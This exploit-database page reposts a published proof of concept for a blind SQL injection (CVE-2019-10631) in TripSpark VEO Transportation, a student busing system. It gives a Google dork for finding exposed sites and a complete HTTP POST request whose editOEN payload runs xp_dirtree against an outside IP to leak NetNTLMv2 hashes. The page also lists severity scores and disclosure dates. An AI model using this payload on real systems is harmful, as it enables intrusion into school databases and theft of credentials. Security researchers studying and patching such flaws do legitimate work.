Advertisement






TripSpark VEO Transportation SQL Injection

CVE Category Price Severity
CVE-2019-10631 CWE-89 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-07-28
CPE
cpe:cpe:/a:tripspark:veo_transportation
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070162

Below is a copy:

TripSpark VEO Transportation SQL Injection
# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection
# Google Dork: inhtml:"Student Busing Information" 
# Date: 07/27/2021
# Exploit Author: Sedric Louissaint @L_Kn0w
# Vendor Homepage: https://www.tripspark.com
# Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf 
# Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084
# OS Tested on: Microsoft Windows Server 2012 R2 Standard
# Vender Notified: 01/19/2021
# Confirmed Patch was released : 06/15/2021

# Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the Student Busing Information search queries. An exploit is not necessary to take advantage of this vulnerability.

# PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound).

```

POST / HTTP/1.1
Host: vulnerable.site.net
User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4700
Origin: vulnerable.site.net
Connection: close
Referer: https:// vulnerable.site.net 
Cookie: ASP.NET_SessionId=x
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

__VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit

```

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.